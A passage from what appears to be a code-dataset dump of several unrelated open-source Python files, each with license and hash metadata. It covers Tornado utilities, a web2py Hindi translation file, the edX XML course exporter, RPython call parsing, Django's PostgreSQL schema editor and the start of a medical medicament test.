return args[self.arg_pos]
else:
return kwargs.get(self.name, default)
def replace(self, new_value, args, kwargs):
"""Replace the named argument in ``args, kwargs`` with ``new_value``.
Returns ``(old_value, args, kwargs)``. The returned ``args`` and
``kwargs`` objects may not be the same as the input objects, or
the input objects may be mutated.
If the named argument was not found, ``new_value`` will be added
to ``kwargs`` and None will be returned as ``old_value``.
"""
if self.arg_pos is not None and len(args) > self.arg_pos:
# The arg to replace is passed positionally
old_value = args[self.arg_pos]
args = list(args) # *args is normally a tuple
args[self.arg_pos] = new_value
else:
# The arg to replace is either omitted or passed by keyword.
old_value = kwargs.get(self.name)
kwargs[self.name] = new_value
return old_value, args, kwargs
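# Illustrative usage (hypothetical function and callback, not from Tornado):
#
#   def fetch(url, callback=None):
#       ...
#
#   replacer = ArgReplacer(fetch, 'callback')
#   old_cb, args, kwargs = replacer.replace(new_cb, ('http://example.com',), {})
#   # `fetch` can now be re-invoked as fetch(*args, **kwargs) with new_cb in
#   # place of whatever callback (if any) was originally supplied.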
def timedelta_to_seconds(td):
"""Equivalent to td.total_seconds() (introduced in python 2.7)."""
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6) / float(10 ** 6)
def _websocket_mask_python(mask, data):
"""Websocket masking function.
`mask` is a `bytes` object of length 4; `data` is a `bytes` object of any length.
Returns a `bytes` object of the same length as `data` with the mask applied
as specified in section 5.3 of RFC 6455.
This pure-python implementation may be replaced by an optimized version when available.
"""
mask = array.array("B", mask)
unmasked = array.array("B", data)
for i in xrange(len(data)):
unmasked[i] = unmasked[i] ^ mask[i % 4]
if hasattr(unmasked, 'tobytes'):
# tostring was deprecated in py32. It hasn't been removed,
# but since we turn on deprecation warnings in our tests
# we need to use the right one.
return unmasked.tobytes()
else:
return unmasked.tostring()
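# Hypothetical round-trip check (not in the original source): XOR masking is an
# involution, so applying the same 4-byte mask twice restores the payload.
#
#   masked = _websocket_mask_python(b'abcd', b'hello websocket')
#   assert _websocket_mask_python(b'abcd', masked) == b'hello websocket'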
if (os.environ.get('TORNADO_NO_EXTENSION') or
os.environ.get('TORNADO_EXTENSION') == '0'):
# These environment variables exist to make it easier to do performance
# comparisons; they are not guaranteed to remain supported in the future.
_websocket_mask = _websocket_mask_python
else:
try:
from tornado.speedups import websocket_mask as _websocket_mask
except ImportError:
if os.environ.get('TORNADO_EXTENSION') == '1':
raise
_websocket_mask = _websocket_mask_python
def doctests():
import doctest
return doctest.DocTestSuite()
| gpl-3.0 | -9,205,382,301,484,718,000 | 33.330532 | 97 | 0.646785 | false |
aidan-fitz/instant-press | languages/hi-hi.py | 6 | 10092 | # coding: utf8
{
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'%s rows deleted': '%s पंक्तियाँ मिटाएँ',
'%s rows updated': '%s पंक्तियाँ अद्यतन',
'Admin Panel': 'Admin Panel',
'Are you sure to delete this category?': 'Are you sure to delete this category?',
'Are you sure you want to delete this category?': 'Are you sure you want to delete this category?',
'Articles in Archive ': 'Articles in Archive ',
'Articles with ': 'Articles with ',
'Articles with category': 'Articles with category',
'Articles with tag': 'Articles with tag',
'Available databases and tables': 'उपलब्ध डेटाबेस और तालिका',
'Avatar uploaded': 'Avatar uploaded',
'Avatars are disable.': 'Avatars are disable.',
'Back to the index page': 'Back to the index page',
'Cannot be empty': 'खाली नहीं हो सकता',
'Change Avatar': 'Change Avatar',
'Change Password': 'पासवर्ड बदलें',
'Change about': 'Change about',
'Change author': 'Change author',
'Change content': 'Change content',
'Change css': 'Change css',
'Change description': 'Change description',
'Change email': 'Change email',
'Change extract': 'Change extract',
'Change first name': 'Change first name',
'Change footer': 'Change footer',
'Change front page': 'Change front page',
'Change keywords (sep. by ,)': 'Change keywords (sep. by ,)',
'Change last name': 'Change last name',
'Change logo url': 'Change logo url',
'Change name': 'Change name',
'Change password': 'Change password',
'Change site information': 'Change site information',
'Change subtitle': 'Change subtitle',
'Change title': 'Change title',
'Change url': 'Change url',
'Check to delete': 'हटाने के लिए चुनें',
'Close this window': 'Close this window',
'Comment edit': 'Comment edit',
'Controller': 'Controller',
'Copyright': 'Copyright',
'Current request': 'वर्तमान अनुरोध',
'Current response': 'वर्तमान प्रतिक्रिया',
'Current session': 'वर्तमान सेशन',
'DB Model': 'DB Model',
'Database': 'Database',
'Delete:': 'मिटाना:',
'Edit': 'Edit',
'Edit Profile': 'प्रोफ़ाइल संपादित करें',
'Edit This App': 'Edit This App',
'Edit current record': 'वर्तमान रेकॉर्ड संपादित करें ',
'Error 400!': 'Error 400!',
'Error 404!': 'Error 404!',
'Hello World': 'Hello World',
'Hello from MyApp': 'Hello from MyApp',
'Import/Export': 'आयात / निर्यात',
'Index': 'Index',
'Internal State': 'आंतरिक स्थिति',
'Invalid Query': 'अमान्य प्रश्न',
'Language': 'Language',
'Layout': 'Layout',
'Leave a Reply': 'Leave a Reply',
'Login': 'लॉग इन',
'Logout': 'लॉग आउट',
'Lost Password': 'पासवर्ड खो गया',
'Lost password': 'Lost password',
'Main Menu': 'Main Menu',
'Make sure all words are spelled correctly': 'Make sure all words are spelled correctly',
'Menu Model': 'Menu Model',
'My Profile': 'My Profile',
'New Record': 'नया रेकॉर्ड',
'No comments loaded yet!. If persist enable javascript or update your browser.': 'No comments loaded yet!. If persist enable javascript or update your browser.',
'No databases in this application': 'इस अनुप्रयोग में कोई डेटाबेस नहीं हैं',
'No message receive from server': 'No message receive from server',
'Powered by': 'Powered by',
'Problem with avatars': 'Problem with avatars',
'Problem with categorie id value!': 'Problem with categorie id value!',
'Problem with id value': 'Problem with id value',
'Problem with some submitted values': 'Problem with some submitted values',
'Problem with the values submitted': 'Problem with the values submitted',
'Query:': 'प्रश्न:',
'Register': 'पंजीकृत (रजिस्टर) करना ',
'Rows in table': 'तालिका में पंक्तियाँ ',
'Rows selected': 'चयनित (चुने गये) पंक्तियाँ ',
'Save the content': 'Save the content',
'Show articles': 'Show articles',
'Show categories': 'Show categories',
'Show comments': 'Show comments',
'Show images': 'Show images',
'Show links': 'Show links',
'Show or hide the admin panel': 'Show or hide the admin panel',
'Show styles': 'Show styles',
'Show the list of articles': 'Show the list of articles',
'Show the list of categories': 'Show the list of categories',
'Show the list of comments': 'Show the list of comments',
'Show the list of images': 'Show the list of images',
'Show the list of links': 'Show the list of links',
'Show the list of styles': 'Show the list of styles',
'Show the list of users': 'Show the list of users',
'Show users': 'Show users',
'Showing': 'Showing',
'Sign in': 'Sign in',
'Sign in with your google account': 'Sign in with your google account',
"Sorry, but this article doesn't exist!": "Sorry, but this article doesn't exist!",
'Stylesheet': 'Stylesheet',
'Sure you want to delete this article?': 'Sure you want to delete this article?',
'Sure you want to delete this comment?': 'Sure you want to delete this comment?',
'Sure you want to delete this image?': 'Sure you want to delete this image?',
'Sure you want to delete this link?': 'Sure you want to delete this link?',
'Sure you want to delete this object?': 'सुनिश्चित हैं कि आप इस वस्तु को हटाना चाहते हैं?',
'Sure you want to delete this style?': 'Sure you want to delete this style?',
'Sure you want to delete this user?': 'Sure you want to delete this user?',
'Tags': 'Tags',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.',
"The article id doesn't exist": "The article id doesn't exist",
"The article id or page number doesn't exist": "The article id or page number doesn't exist",
"The article id, page number, or reply doesn't exist": "The article id, page number, or reply doesn't exist",
"The comment id doesn't exist": "The comment id doesn't exist",
'The search for': 'The search for',
'There was a problem with values of Year - Month': 'There was a problem with values of Year - Month',
'This article was updated on': 'This article was updated on',
"This function doesn't exist": "This function doesn't exist",
"This function doesn't exist!": "This function doesn't exist!",
'Update:': 'अद्यतन करना:',
'Upload your image': 'Upload your image',
'Url to an image': 'Url to an image',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.',
'Use more general keywords': 'Use more general keywords',
'View': 'View',
'Warning: This will replace your css with the default value from current style. Are you sure you want to continue?': 'Warning: This will replace your css with the default value from current style. Are you sure you want to continue?',
'Welcome %s': 'Welcome %s',
'Welcome to web2py': 'वेब२पाइ (web2py) में आपका स्वागत है',
'You are not logged in': 'You are not logged in',
'You have to sign in to your account before comment': 'You have to sign in to your account before comment',
'You need to sign in as an admin': 'You need to sign in as an admin',
'You need to submit your search text.': 'You need to submit your search text.',
'appadmin is disabled because insecure channel': 'अप आडमिन (appadmin) अक्षम है क्योंकि असुरक्षित चैनल',
'cache': 'cache',
'change password': 'change password',
'click here for online examples': 'ऑनलाइन उदाहरण के लिए यहाँ क्लिक करें',
'click here for the administrative interface': 'प्रशासनिक इंटरफेस के लिए यहाँ क्लिक करें',
'customize me!': 'मुझे अनुकूलित (कस्टमाइज़) करें!',
'data uploaded': 'डाटा अपलोड सम्पन्न ',
'database': 'डेटाबेस',
'database %s select': 'डेटाबेस %s चुनी हुई',
'db': 'db',
'design': 'रचना करें',
'done!': 'हो गया!',
'edit profile': 'edit profile',
'export as csv file': 'csv फ़ाइल के रूप में निर्यात',
'in categories': 'in categories',
'insert new': 'नया डालें',
'insert new %s': 'नया %s डालें',
'invalid request': 'अवैध अनुरोध',
'login': 'login',
'logout': 'logout',
'new record inserted': 'नया रेकॉर्ड डाला',
'next 100 rows': 'अगले 100 पंक्तियाँ',
'not yield any results': 'not yield any results',
'or import from csv file': 'या csv फ़ाइल से आयात',
'previous 100 rows': 'पिछले 100 पंक्तियाँ',
'record': 'record',
'record does not exist': 'रिकॉर्ड मौजूद नहीं है',
'record id': 'रिकॉर्ड पहचानकर्ता (आईडी)',
'register': 'register',
'results': 'results',
'selected': 'चुना हुआ',
'state': 'स्थिति',
'table': 'तालिका',
'unable to parse csv file': 'csv फ़ाइल पार्स करने में असमर्थ',
}
| gpl-2.0 | 3,418,578,968,777,350,000 | 47.857143 | 281 | 0.663743 | false |
proversity-org/edx-platform | common/lib/xmodule/xmodule/modulestore/xml_exporter.py | 12 | 18035 | """
Methods for exporting course data to XML
"""
import logging
from abc import abstractmethod
from six import text_type
import lxml.etree
from xblock.fields import Scope, Reference, ReferenceList, ReferenceValueDict
from xmodule.contentstore.content import StaticContent
from xmodule.exceptions import NotFoundError
from xmodule.assetstore import AssetMetadata
from xmodule.modulestore import EdxJSONEncoder, ModuleStoreEnum
from xmodule.modulestore.inheritance import own_metadata
from xmodule.modulestore.store_utilities import draft_node_constructor, get_draft_subtree_roots
from xmodule.modulestore import LIBRARY_ROOT
from fs.osfs import OSFS
from json import dumps
import os
from xmodule.modulestore.draft_and_published import DIRECT_ONLY_CATEGORIES
from opaque_keys.edx.locator import CourseLocator, LibraryLocator
DRAFT_DIR = "drafts"
PUBLISHED_DIR = "published"
DEFAULT_CONTENT_FIELDS = ['metadata', 'data']
def _export_drafts(modulestore, course_key, export_fs, xml_centric_course_key):
"""
Exports course drafts.
"""
# NOTE: we need to explicitly implement the logic for setting the vertical's parent
# and index here since the XML modulestore cannot load draft modules
with modulestore.branch_setting(ModuleStoreEnum.Branch.draft_preferred, course_key):
draft_modules = modulestore.get_items(
course_key,
qualifiers={'category': {'$nin': DIRECT_ONLY_CATEGORIES}},
revision=ModuleStoreEnum.RevisionOption.draft_only
)
# Check to see if the returned draft modules have changes w.r.t. the published module.
# Only modules with changes will be exported into the /drafts directory.
draft_modules = [module for module in draft_modules if modulestore.has_changes(module)]
if draft_modules:
draft_course_dir = export_fs.makedir(DRAFT_DIR, recreate=True)
# accumulate tuples of draft_modules and their parents in
# this list:
draft_node_list = []
for draft_module in draft_modules:
parent_loc = modulestore.get_parent_location(
draft_module.location,
revision=ModuleStoreEnum.RevisionOption.draft_preferred
)
# if module has no parent, set its parent_url to `None`
parent_url = None
if parent_loc is not None:
parent_url = text_type(parent_loc)
draft_node = draft_node_constructor(
draft_module,
location=draft_module.location,
url=text_type(draft_module.location),
parent_location=parent_loc,
parent_url=parent_url,
)
draft_node_list.append(draft_node)
for draft_node in get_draft_subtree_roots(draft_node_list):
# only export the roots of the draft subtrees
# since export_from_xml (called by `add_xml_to_node`)
# exports a whole tree
# ensure module has "xml_attributes" attr
if not hasattr(draft_node.module, 'xml_attributes'):
draft_node.module.xml_attributes = {}
# Don't try to export orphaned items
# and their descendents
if draft_node.parent_location is None:
continue
logging.debug('parent_loc = %s', draft_node.parent_location)
draft_node.module.xml_attributes['parent_url'] = draft_node.parent_url
parent = modulestore.get_item(draft_node.parent_location)
# Don't try to export orphaned items
if draft_node.module.location not in parent.children:
continue
index = parent.children.index(draft_node.module.location)
draft_node.module.xml_attributes['index_in_children_list'] = str(index)
draft_node.module.runtime.export_fs = draft_course_dir
adapt_references(draft_node.module, xml_centric_course_key, draft_course_dir)
node = lxml.etree.Element('unknown')
draft_node.module.add_xml_to_node(node)
class ExportManager(object):
"""
Manages XML exporting for courselike objects.
"""
def __init__(self, modulestore, contentstore, courselike_key, root_dir, target_dir):
"""
Export all modules from `modulestore` and content from `contentstore` as xml to `root_dir`.
`modulestore`: A `ModuleStore` object that is the source of the modules to export
`contentstore`: A `ContentStore` object that is the source of the content to export, can be None
`courselike_key`: The Locator of the Descriptor to export
`root_dir`: The directory to write the exported xml to
`target_dir`: The name of the directory inside `root_dir` to write the content to
"""
self.modulestore = modulestore
self.contentstore = contentstore
self.courselike_key = courselike_key
self.root_dir = root_dir
self.target_dir = text_type(target_dir)
@abstractmethod
def get_key(self):
"""
Get the courselike locator key
"""
raise NotImplementedError
def process_root(self, root, export_fs):
"""
Perform any additional tasks to the root XML node.
"""
def process_extra(self, root, courselike, root_courselike_dir, xml_centric_courselike_key, export_fs):
"""
Process additional content, like static assets.
"""
def post_process(self, root, export_fs):
"""
Perform any final processing after the other export tasks are done.
"""
@abstractmethod
def get_courselike(self):
"""
Get the target courselike object for this export.
"""
def export(self):
"""
Perform the export given the parameters handed to this class at init.
"""
with self.modulestore.bulk_operations(self.courselike_key):
fsm = OSFS(self.root_dir)
root = lxml.etree.Element('unknown')
# export only the published content
with self.modulestore.branch_setting(ModuleStoreEnum.Branch.published_only, self.courselike_key):
courselike = self.get_courselike()
export_fs = courselike.runtime.export_fs = fsm.makedir(self.target_dir, recreate=True)
# change all of the references inside the course to use the xml expected key type w/o version & branch
xml_centric_courselike_key = self.get_key()
adapt_references(courselike, xml_centric_courselike_key, export_fs)
courselike.add_xml_to_node(root)
# Make any needed adjustments to the root node.
self.process_root(root, export_fs)
# Process extra items-- drafts, assets, etc
root_courselike_dir = self.root_dir + '/' + self.target_dir
self.process_extra(root, courselike, root_courselike_dir, xml_centric_courselike_key, export_fs)
# Any last pass adjustments
self.post_process(root, export_fs)
class CourseExportManager(ExportManager):
"""
Export manager for courses.
"""
def get_key(self):
return CourseLocator(
self.courselike_key.org, self.courselike_key.course, self.courselike_key.run, deprecated=True
)
def get_courselike(self):
# depth = None: Traverses down the entire course structure.
# lazy = False: Loads and caches all block definitions during traversal for fast access later
# -and- to eliminate many round-trips to read individual definitions.
# Why these parameters? Because a course export needs to access all the course block information
# eventually. Accessing it all now at the beginning increases performance of the export.
return self.modulestore.get_course(self.courselike_key, depth=None, lazy=False)
def process_root(self, root, export_fs):
with export_fs.open(u'course.xml', 'wb') as course_xml:
lxml.etree.ElementTree(root).write(course_xml, encoding='utf-8')
def process_extra(self, root, courselike, root_courselike_dir, xml_centric_courselike_key, export_fs):
# Export the modulestore's asset metadata.
asset_dir = root_courselike_dir + '/' + AssetMetadata.EXPORTED_ASSET_DIR + '/'
if not os.path.isdir(asset_dir):
os.makedirs(asset_dir)
asset_root = lxml.etree.Element(AssetMetadata.ALL_ASSETS_XML_TAG)
course_assets = self.modulestore.get_all_asset_metadata(self.courselike_key, None)
for asset_md in course_assets:
# All asset types are exported using the "asset" tag - but their asset type is specified in each asset key.
asset = lxml.etree.SubElement(asset_root, AssetMetadata.ASSET_XML_TAG)
asset_md.to_xml(asset)
with OSFS(asset_dir).open(AssetMetadata.EXPORTED_ASSET_FILENAME, 'wb') as asset_xml_file:
lxml.etree.ElementTree(asset_root).write(asset_xml_file, encoding='utf-8')
# export the static assets
policies_dir = export_fs.makedir('policies', recreate=True)
if self.contentstore:
self.contentstore.export_all_for_course(
self.courselike_key,
root_courselike_dir + '/static/',
root_courselike_dir + '/policies/assets.json',
)
# If we are using the default course image, export it to the
# legacy location to support backwards compatibility.
if courselike.course_image == courselike.fields['course_image'].default:
try:
course_image = self.contentstore.find(
StaticContent.compute_location(
courselike.id,
courselike.course_image
),
)
except NotFoundError:
pass
else:
output_dir = root_courselike_dir + '/static/images/'
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
with OSFS(output_dir).open(u'course_image.jpg', 'wb') as course_image_file:
course_image_file.write(course_image.data)
# export the static tabs
export_extra_content(
export_fs, self.modulestore, self.courselike_key, xml_centric_courselike_key,
'static_tab', 'tabs', '.html'
)
# export the custom tags
export_extra_content(
export_fs, self.modulestore, self.courselike_key, xml_centric_courselike_key,
'custom_tag_template', 'custom_tags'
)
# export the course updates
export_extra_content(
export_fs, self.modulestore, self.courselike_key, xml_centric_courselike_key,
'course_info', 'info', '.html'
)
# export the 'about' data (e.g. overview, etc.)
export_extra_content(
export_fs, self.modulestore, self.courselike_key, xml_centric_courselike_key,
'about', 'about', '.html'
)
course_policy_dir_name = courselike.location.run
if courselike.url_name != courselike.location.run and courselike.url_name == 'course':
# Use url_name for split mongo because course_run is not used when loading policies.
course_policy_dir_name = courselike.url_name
course_run_policy_dir = policies_dir.makedir(course_policy_dir_name, recreate=True)
# export the grading policy
with course_run_policy_dir.open(u'grading_policy.json', 'wb') as grading_policy:
grading_policy.write(dumps(courselike.grading_policy, cls=EdxJSONEncoder,
sort_keys=True, indent=4).encode('utf-8'))
# export all of the course metadata in policy.json
with course_run_policy_dir.open(u'policy.json', 'wb') as course_policy:
policy = {'course/' + courselike.location.block_id: own_metadata(courselike)}
course_policy.write(dumps(policy, cls=EdxJSONEncoder, sort_keys=True, indent=4).encode('utf-8'))
_export_drafts(self.modulestore, self.courselike_key, export_fs, xml_centric_courselike_key)
class LibraryExportManager(ExportManager):
"""
Export manager for Libraries
"""
def get_key(self):
"""
Get the library locator for the current library key.
"""
return LibraryLocator(
self.courselike_key.org, self.courselike_key.library
)
def get_courselike(self):
"""
Get the library from the modulestore.
"""
return self.modulestore.get_library(self.courselike_key, depth=None, lazy=False)
def process_root(self, root, export_fs):
"""
Add extra attributes to the root XML file.
"""
root.set('org', self.courselike_key.org)
root.set('library', self.courselike_key.library)
def process_extra(self, root, courselike, root_courselike_dir, xml_centric_courselike_key, export_fs):
"""
Notionally, libraries may have assets. This is currently unsupported, but the structure is here
to ease in duck typing during import. This may be expanded as a useful feature eventually.
"""
# export the static assets
export_fs.makedir('policies', recreate=True)
if self.contentstore:
self.contentstore.export_all_for_course(
self.courselike_key,
self.root_dir + '/' + self.target_dir + '/static/',
self.root_dir + '/' + self.target_dir + '/policies/assets.json',
)
def post_process(self, root, export_fs):
"""
Because Libraries are XBlocks, they aren't exported in the same way Course Modules
are, but instead use the standard XBlock serializers. Accordingly, we need to
create our own index file to act as the equivalent to the root course.xml file,
called library.xml.
"""
# Create the Library.xml file, which acts as the index of all library contents.
xml_file = export_fs.open(LIBRARY_ROOT, 'wb')
xml_file.write(lxml.etree.tostring(root, pretty_print=True, encoding='utf-8'))
xml_file.close()
def export_course_to_xml(modulestore, contentstore, course_key, root_dir, course_dir):
"""
Thin wrapper for the Course Export Manager. See ExportManager for details.
"""
CourseExportManager(modulestore, contentstore, course_key, root_dir, course_dir).export()
def export_library_to_xml(modulestore, contentstore, library_key, root_dir, library_dir):
"""
Thin wrapper for the Library Export Manager. See ExportManager for details.
"""
LibraryExportManager(modulestore, contentstore, library_key, root_dir, library_dir).export()
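# Illustrative call of the course export wrapper above (the store factories,
# course key, and paths are hypothetical, not part of this module):
#
#   export_course_to_xml(
#       modulestore(), contentstore(),
#       CourseKey.from_string('course-v1:Org+Course+Run'),
#       '/tmp/export_root', 'exported_course',
#   )
#
# The exported tree then lives under /tmp/export_root/exported_course/, with
# course.xml at its root and drafts, policies, and static assets alongside it.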
def adapt_references(subtree, destination_course_key, export_fs):
"""
Map every reference in the subtree into destination_course_key and set it back into the xblock fields
"""
subtree.runtime.export_fs = export_fs # ensure everything knows where it's going!
for field_name, field in subtree.fields.iteritems():
if field.is_set_on(subtree):
if isinstance(field, Reference):
value = field.read_from(subtree)
if value is not None:
field.write_to(subtree, field.read_from(subtree).map_into_course(destination_course_key))
elif field_name == 'children':
# don't change the children field but do recurse over the children
[adapt_references(child, destination_course_key, export_fs) for child in subtree.get_children()]
elif isinstance(field, ReferenceList):
field.write_to(
subtree,
[ele.map_into_course(destination_course_key) for ele in field.read_from(subtree)]
)
elif isinstance(field, ReferenceValueDict):
field.write_to(
subtree, {
key: ele.map_into_course(destination_course_key) for key, ele in field.read_from(subtree).iteritems()
}
)
def _export_field_content(xblock_item, item_dir):
"""
Export all fields related to 'xblock_item' other than 'metadata' and 'data' to json file in provided directory
"""
module_data = xblock_item.get_explicitly_set_fields_by_scope(Scope.content)
if isinstance(module_data, dict):
for field_name in module_data:
if field_name not in DEFAULT_CONTENT_FIELDS:
# filename format: {dirname}.{field_name}.json
with item_dir.open(u'{0}.{1}.{2}'.format(xblock_item.location.block_id, field_name, 'json'),
'wb') as field_content_file:
field_content_file.write(dumps(module_data.get(field_name, {}), cls=EdxJSONEncoder,
sort_keys=True, indent=4).encode('utf-8'))
def export_extra_content(export_fs, modulestore, source_course_key, dest_course_key, category_type, dirname, file_suffix=''):
    """
    Export every item of the given category from the source course into `dirname`,
    rewriting its references to point at the destination course key.
    """
items = modulestore.get_items(source_course_key, qualifiers={'category': category_type})
if len(items) > 0:
item_dir = export_fs.makedir(dirname, recreate=True)
for item in items:
adapt_references(item, dest_course_key, export_fs)
with item_dir.open(item.location.block_id + file_suffix, 'wb') as item_file:
item_file.write(item.data.encode('utf8'))
            # export content fields other than metadata and data in json format in current directory
_export_field_content(item, item_dir)
| agpl-3.0 | -5,251,375,027,366,788,000 | 43.095355 | 125 | 0.623233 | false |
jptomo/rpython-lang-scheme | rpython/rtyper/callparse.py | 1 | 4745 | from rpython.annotator.argument import ArgumentsForTranslation, ArgErr
from rpython.annotator import model as annmodel
from rpython.rtyper import rtuple
from rpython.rtyper.error import TyperError
from rpython.rtyper.lltypesystem import lltype
class ArgumentsForRtype(ArgumentsForTranslation):
def newtuple(self, items):
return NewTupleHolder(items)
def unpackiterable(self, it):
assert it.is_tuple()
items = it.items()
return list(items)
def getrinputs(rtyper, graph):
"""Return the list of reprs of the input arguments to the 'graph'."""
return [rtyper.bindingrepr(v) for v in graph.getargs()]
def getrresult(rtyper, graph):
"""Return the repr of the result variable of the 'graph'."""
if graph.getreturnvar().annotation is not None:
return rtyper.bindingrepr(graph.getreturnvar())
else:
return lltype.Void
def getsig(rtyper, graph):
"""Return the complete 'signature' of the graph."""
return (graph.signature,
graph.defaults,
getrinputs(rtyper, graph),
getrresult(rtyper, graph))
def callparse(rtyper, graph, hop, r_self=None):
"""Parse the arguments of 'hop' when calling the given 'graph'.
"""
rinputs = getrinputs(rtyper, graph)
def args_h(start):
return [VarHolder(i, hop.args_s[i])
for i in range(start, hop.nb_args)]
if r_self is None:
start = 1
else:
start = 0
rinputs[0] = r_self
opname = hop.spaceop.opname
if opname == "simple_call":
arguments = ArgumentsForRtype(args_h(start))
elif opname == "call_args":
arguments = ArgumentsForRtype.fromshape(
hop.args_s[start].const, # shape
args_h(start+1))
# parse the arguments according to the function we are calling
signature = graph.signature
defs_h = []
if graph.defaults:
for x in graph.defaults:
defs_h.append(ConstHolder(x))
try:
holders = arguments.match_signature(signature, defs_h)
except ArgErr, e:
raise TyperError("signature mismatch: %s" % e.getmsg(graph.name))
assert len(holders) == len(rinputs), "argument parsing mismatch"
vlist = []
for h,r in zip(holders, rinputs):
v = h.emit(r, hop)
vlist.append(v)
return vlist
class Holder(object):
def is_tuple(self):
return False
def emit(self, repr, hop):
try:
cache = self._cache
except AttributeError:
cache = self._cache = {}
try:
return cache[repr]
except KeyError:
v = self._emit(repr, hop)
cache[repr] = v
return v
class VarHolder(Holder):
def __init__(self, num, s_obj):
self.num = num
self.s_obj = s_obj
def is_tuple(self):
return isinstance(self.s_obj, annmodel.SomeTuple)
def items(self):
assert self.is_tuple()
n = len(self.s_obj.items)
return tuple([ItemHolder(self, i) for i in range(n)])
def _emit(self, repr, hop):
return hop.inputarg(repr, arg=self.num)
def access(self, hop):
repr = hop.args_r[self.num]
return repr, self.emit(repr, hop)
class ConstHolder(Holder):
def __init__(self, value):
self.value = value
def is_tuple(self):
return type(self.value) is tuple
def items(self):
assert self.is_tuple()
return self.value
def _emit(self, repr, hop):
return hop.inputconst(repr, self.value)
class NewTupleHolder(Holder):
def __new__(cls, holders):
for h in holders:
if not isinstance(h, ItemHolder) or not h.holder == holders[0].holder:
break
else:
if 0 < len(holders) == len(holders[0].holder.items()):
return holders[0].holder
inst = Holder.__new__(cls)
inst.holders = tuple(holders)
return inst
def is_tuple(self):
return True
def items(self):
return self.holders
def _emit(self, repr, hop):
assert isinstance(repr, rtuple.TupleRepr)
tupleitems_v = []
for h in self.holders:
v = h.emit(repr.items_r[len(tupleitems_v)], hop)
tupleitems_v.append(v)
vtuple = repr.newtuple(hop.llops, repr, tupleitems_v)
return vtuple
class ItemHolder(Holder):
def __init__(self, holder, index):
self.holder = holder
self.index = index
def _emit(self, repr, hop):
index = self.index
r_tup, v_tuple = self.holder.access(hop)
v = r_tup.getitem_internal(hop, v_tuple, index)
return hop.llops.convertvar(v, r_tup.items_r[index], repr)
| mit | 3,914,594,531,846,699,500 | 28.110429 | 82 | 0.600421 | false |
smi96/django-blog_website | lib/python2.7/site-packages/django/db/backends/postgresql/schema.py | 202 | 4100 | import psycopg2
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_alter_column_type = "ALTER COLUMN %(column)s TYPE %(type)s USING %(column)s::%(type)s"
sql_create_sequence = "CREATE SEQUENCE %(sequence)s"
sql_delete_sequence = "DROP SEQUENCE IF EXISTS %(sequence)s CASCADE"
sql_set_sequence_max = "SELECT setval('%(sequence)s', MAX(%(column)s)) FROM %(table)s"
sql_create_varchar_index = "CREATE INDEX %(name)s ON %(table)s (%(columns)s varchar_pattern_ops)%(extra)s"
sql_create_text_index = "CREATE INDEX %(name)s ON %(table)s (%(columns)s text_pattern_ops)%(extra)s"
def quote_value(self, value):
return psycopg2.extensions.adapt(value)
def _model_indexes_sql(self, model):
output = super(DatabaseSchemaEditor, self)._model_indexes_sql(model)
if not model._meta.managed or model._meta.proxy or model._meta.swapped:
return output
for field in model._meta.local_fields:
db_type = field.db_type(connection=self.connection)
if db_type is not None and (field.db_index or field.unique):
# Fields with database column types of `varchar` and `text` need
# a second index that specifies their operator class, which is
# needed when performing correct LIKE queries outside the
# C locale. See #12234.
#
# The same doesn't apply to array fields such as varchar[size]
# and text[size], so skip them.
if '[' in db_type:
continue
if db_type.startswith('varchar'):
output.append(self._create_index_sql(
model, [field], suffix='_like', sql=self.sql_create_varchar_index))
elif db_type.startswith('text'):
output.append(self._create_index_sql(
model, [field], suffix='_like', sql=self.sql_create_text_index))
return output
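    # Hedged illustration: for a field such as
    #     name = models.CharField(max_length=50, db_index=True)
    # the loop above adds, besides the usual btree index, a statement along the
    # lines of
    #     CREATE INDEX "app_model_name_like" ON "app_model" ("name" varchar_pattern_ops)
    # (the exact index name is generated), which is what lets LIKE/startswith
    # lookups use an index outside the C locale.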
def _alter_column_type_sql(self, table, old_field, new_field, new_type):
"""
Makes ALTER TYPE with SERIAL make sense.
"""
if new_type.lower() == "serial":
column = new_field.column
sequence_name = "%s_%s_seq" % (table, column)
return (
(
self.sql_alter_column_type % {
"column": self.quote_name(column),
"type": "integer",
},
[],
),
[
(
self.sql_delete_sequence % {
"sequence": self.quote_name(sequence_name),
},
[],
),
(
self.sql_create_sequence % {
"sequence": self.quote_name(sequence_name),
},
[],
),
(
self.sql_alter_column % {
"table": self.quote_name(table),
"changes": self.sql_alter_column_default % {
"column": self.quote_name(column),
"default": "nextval('%s')" % self.quote_name(sequence_name),
}
},
[],
),
(
self.sql_set_sequence_max % {
"table": self.quote_name(table),
"column": self.quote_name(column),
"sequence": self.quote_name(sequence_name),
},
[],
),
],
)
else:
return super(DatabaseSchemaEditor, self)._alter_column_type_sql(
table, old_field, new_field, new_type
)
| mit | 2,130,684,223,850,867,500 | 41.708333 | 110 | 0.467561 | false |
laslabs/vertical-medical | medical_medicament_us/tests/test_medical_medicament.py | 1 | 2603 | # -*- coding: utf-8 -*-
# Copyright 2016 LasLabs Inc.
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from openerp.tests.common import TransactionCase
class TestMedicalMedicament(TransactionCase):
def setUp(self):
super(TestMedicalMedicament, self).setUp()
self.test_gcn = self.env['medical.medicament.gcn'].create({})
self.test_drug_form = self.env.ref('medical_medicament.AEM')
def _new_medicament(self, extra_values):
base_values = {
'drug_form_id': self.test_drug_form.id,
'name': 'Test Medicament',
'gcn_id': self.test_gcn.id,
}
base_values.update(extra_values)
return self.env['medical.medicament'].create(base_values)
def test_compute_brand_ids_no_gcn_id(self):
'''It should return an empty recordset for medicaments without a GCN'''
test_medicament = self._new_medicament({'gcn_id': None})
